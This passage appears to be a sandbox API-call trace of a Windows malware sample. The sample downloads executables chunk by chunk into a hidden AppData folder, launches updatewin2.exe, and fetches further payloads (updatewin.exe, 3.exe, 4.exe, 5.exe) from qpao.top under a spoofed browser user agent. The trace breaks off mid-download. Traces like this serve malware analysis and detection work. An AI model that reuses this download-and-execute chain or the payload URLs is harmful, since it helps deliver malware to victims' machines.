InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.379] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.379] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.444] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.445] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.446] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.446] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.446] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.447] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.513] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.513] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.514] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.514] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.515] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.515] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.541] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.541] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.542] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.542] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.596] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.596] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.597] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.597] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.598] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.598] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.625] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.625] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.634] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.634] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.639] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.640] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0129.641] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0129.641] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x1200) returned 1 [0129.645] WriteFile (in: hFile=0x6b4, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x1200, lpOverlapped=0x0) returned 1 [0129.645] CloseHandle (hObject=0x6b4) returned 1 [0129.655] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0129.663] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0129.663] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin2.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0129.870] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x635d058 | out: hHeap=0x31d0000) returned 1 [0129.870] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x635a1d0 | out: hHeap=0x31d0000) returned 1 [0129.870] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c0c40 | out: hHeap=0x31d0000) returned 1 [0129.870] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0129.871] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x30) returned 0x5e3fdb0 [0129.871] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x85e) returned 0x62c0c40 [0129.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e3fdb0, cbMultiByte=-1, lpWideCharStr=0x62c0c40, cchWideChar=1071 | out: lpWideCharStr="http://qpao.top/files/penelop/updatewin.exe") returned 44 [0129.871] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x860) returned 0x6377dc0 [0129.871] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c0c40 | out: hHeap=0x31d0000) returned 1 [0129.871] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3fdb0 | out: hHeap=0x31d0000) returned 1 [0129.871] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x860) returned 0x62c0c40 [0129.871] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x82f) returned 0x6325838 [0129.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://qpao.top/files/penelop/updatewin.exe", cchWideChar=-1, lpMultiByteStr=0x6325838, cbMultiByte=2095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://qpao.top/files/penelop/updatewin.exe", lpUsedDefaultChar=0x0) returned 44 [0129.871] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x6324fb0 [0129.871] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6325838 | out: hHeap=0x31d0000) returned 1 [0129.871] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c0c40 | out: hHeap=0x31d0000) returned 1 [0129.871] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://qpao.top/files/penelop/updatewin.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0130.290] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6324fb0 | out: hHeap=0x31d0000) returned 1 [0130.290] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0xc85d6d0, lpdwBufferLength=0xc85d710, lpdwIndex=0x0 | out: lpBuffer=0xc85d6d0*, lpdwBufferLength=0xc85d710*=0x4, lpdwIndex=0x0) returned 1 [0130.290] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6377dc0 | out: hHeap=0x31d0000) returned 1 [0130.291] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0130.291] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x30) returned 0x5e3fdb0 [0130.291] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x84e) returned 0x62c0c40 [0130.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e3fdb0, cbMultiByte=-1, lpWideCharStr=0x62c0c40, cchWideChar=1063 | out: lpWideCharStr="http://qpao.top/files/penelop/3.exe") returned 36 [0130.291] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x850) returned 0x6377dc0 [0130.291] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c0c40 | out: hHeap=0x31d0000) returned 1 [0130.291] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3fdb0 | out: hHeap=0x31d0000) returned 1 [0130.291] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x850) returned 0x62c0c40 [0130.291] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x827) returned 0x63898e8 [0130.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://qpao.top/files/penelop/3.exe", cchWideChar=-1, lpMultiByteStr=0x63898e8, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://qpao.top/files/penelop/3.exe", lpUsedDefaultChar=0x0) returned 36 [0130.291] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x6324fb0 [0130.291] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x63898e8 | out: hHeap=0x31d0000) returned 1 [0130.291] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c0c40 | out: hHeap=0x31d0000) returned 1 [0130.291] InternetOpenUrlA (hInternet=0xcc0010, lpszUrl="http://qpao.top/files/penelop/3.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0130.715] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6324fb0 | out: hHeap=0x31d0000) returned 1 [0130.715] HttpQueryInfoW (in: hRequest=0xcc0018, dwInfoLevel=0x20000013, lpBuffer=0xc85d6d0, lpdwBufferLength=0xc85d710, lpdwIndex=0x0 | out: lpBuffer=0xc85d6d0*, lpdwBufferLength=0xc85d710*=0x4, lpdwIndex=0x0) returned 1 [0130.715] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6377dc0 | out: hHeap=0x31d0000) returned 1 [0130.715] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc001c [0130.715] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x30) returned 0x5e3ff38 [0130.715] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x84e) returned 0x62c0c40 [0130.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e3ff38, cbMultiByte=-1, lpWideCharStr=0x62c0c40, cchWideChar=1063 | out: lpWideCharStr="http://qpao.top/files/penelop/4.exe") returned 36 [0130.715] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x850) returned 0x6377dc0 [0130.715] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c0c40 | out: hHeap=0x31d0000) returned 1 [0130.715] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3ff38 | out: hHeap=0x31d0000) returned 1 [0130.715] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x850) returned 0x62c0c40 [0130.715] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x827) returned 0x63898e8 [0130.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://qpao.top/files/penelop/4.exe", cchWideChar=-1, lpMultiByteStr=0x63898e8, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://qpao.top/files/penelop/4.exe", lpUsedDefaultChar=0x0) returned 36 [0130.715] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x6324fb0 [0130.715] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x63898e8 | out: hHeap=0x31d0000) returned 1 [0130.715] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x62c0c40 | out: hHeap=0x31d0000) returned 1 [0130.715] InternetOpenUrlA (hInternet=0xcc001c, lpszUrl="http://qpao.top/files/penelop/4.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0024 [0131.583] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6324fb0 | out: hHeap=0x31d0000) returned 1 [0131.583] HttpQueryInfoW (in: hRequest=0xcc0024, dwInfoLevel=0x20000013, lpBuffer=0xc85d6d0, lpdwBufferLength=0xc85d710, lpdwIndex=0x0 | out: lpBuffer=0xc85d6d0*, lpdwBufferLength=0xc85d710*=0x4, lpdwIndex=0x0) returned 1 [0131.583] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6377dc0 | out: hHeap=0x31d0000) returned 1 [0131.583] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0028 [0131.583] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x30) returned 0x5e3ffe0 [0131.583] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x84e) returned 0x6377dc0 [0131.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5e3ffe0, cbMultiByte=-1, lpWideCharStr=0x6377dc0, cchWideChar=1063 | out: lpWideCharStr="http://qpao.top/files/penelop/5.exe") returned 36 [0131.583] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x850) returned 0x63898e8 [0131.583] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6377dc0 | out: hHeap=0x31d0000) returned 1 [0131.583] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5e3ffe0 | out: hHeap=0x31d0000) returned 1 [0131.583] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x850) returned 0x6377dc0 [0131.583] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x827) returned 0x638a140 [0131.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://qpao.top/files/penelop/5.exe", cchWideChar=-1, lpMultiByteStr=0x638a140, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://qpao.top/files/penelop/5.exe", lpUsedDefaultChar=0x0) returned 36 [0131.583] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x830) returned 0x6324fb0 [0131.583] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x638a140 | out: hHeap=0x31d0000) returned 1 [0131.583] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6377dc0 | out: hHeap=0x31d0000) returned 1 [0131.583] InternetOpenUrlA (hInternet=0xcc0028, lpszUrl="http://qpao.top/files/penelop/5.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0030 [0132.002] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x6324fb0 | out: hHeap=0x31d0000) returned 1 [0132.002] HttpQueryInfoW (in: hRequest=0xcc0030, dwInfoLevel=0x20000013, lpBuffer=0xc85d6d0, lpdwBufferLength=0xc85d710, lpdwIndex=0x0 | out: lpBuffer=0xc85d6d0*, lpdwBufferLength=0xc85d710*=0x4, lpdwIndex=0x0) returned 1 [0132.002] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x30) returned 0x5df2a60 [0132.002] HeapFree (in: hHeap=0x31d0000, dwFlags=0x0, lpMem=0x5df2a60 | out: hHeap=0x31d0000) returned 1 [0132.002] lstrcpyA (in: lpString1=0x62bfbe8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783" [0132.002] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783", pMore="5.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\5.exe") returned 1 [0132.002] RtlAllocateHeap (HeapHandle=0x31d0000, Flags=0x0, Size=0x60) returned 0x635d058 [0132.002] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\68fff198-b032-4cc5-9a68-f439953f0783\\5.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6b0 [0132.004] SetFilePointer (in: hFile=0x6b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.004] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.190] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.192] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.287] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.287] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.292] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.292] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.299] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.299] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.383] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.383] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.390] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.390] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.390] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.391] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.393] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.393] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.485] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.485] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xc85d6d8 | out: lpBuffer=0xc85d778*, lpdwNumberOfBytesRead=0xc85d6d8*=0x2800) returned 1 [0132.486] WriteFile (in: hFile=0x6b0, lpBuffer=0xc85d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xc85d6dc, lpOverlapped=0x0 | out: lpBuffer=0xc85d778*, lpNumberOfBytesWritten=0xc85d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0132.486] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0xc85d778, 